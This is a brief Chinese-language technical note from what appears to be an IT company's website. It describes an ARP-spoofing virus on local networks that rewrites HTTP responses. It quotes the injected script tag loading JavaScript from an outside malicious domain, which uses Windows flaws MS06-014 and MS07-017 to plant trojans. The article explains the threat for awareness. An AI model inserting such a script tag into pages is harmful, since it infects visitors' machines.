科宏信息
  
加入收藏设为首页

新闻资讯
服务直通车
  • 解决方案
  • 服务中心
  • 在线留言
  • 联系我们
技术交流

ARP病毒新的表现形式-ARP原理

时间:2013年05月27日 作者:科宏信息 网址:www.kerhon.com
    最新的一种 A R P病毒表现在对于一些 H T T P 请求访问的修改。当局域 网的机器访问一些网站时, 会在其请求的网页的源代码中加入特殊的病毒(一种具有隐蔽性破坏性传染性的恶意代码)
代码, 从而造成网页无法访问, 并且利用系统漏洞导致机器中毒。C k 1 . i n就是这种病毒(一种具有隐蔽性破坏性传染性的恶意代码)的一种, 这种病毒导致某些网站无法正常访问, 但对百度、 搜狐的网站又能正常访问。不能访问的网页代码中都被加入<s c r i p t   s r e =h t t p : / / c k 1 . i n / N . J S>< / s c r i p t >这段代码, 该代码其实就是恶意网址连接!该恶意网址连接会利用 M S 0 6—0 1 4和 MS 0 7—0 1 7等多种系统漏洞, 向局域网电脑种植木马病毒(一种具有隐蔽性破坏性传染性的恶意代码)!这样, 如果一个局域网中存在这样的 AR P病毒电脑的话, 顷刻间, 整个网段的电脑将会全部中毒 。
本篇文章来源于 中国协议分析网|www.cnpaf.net 原文链接: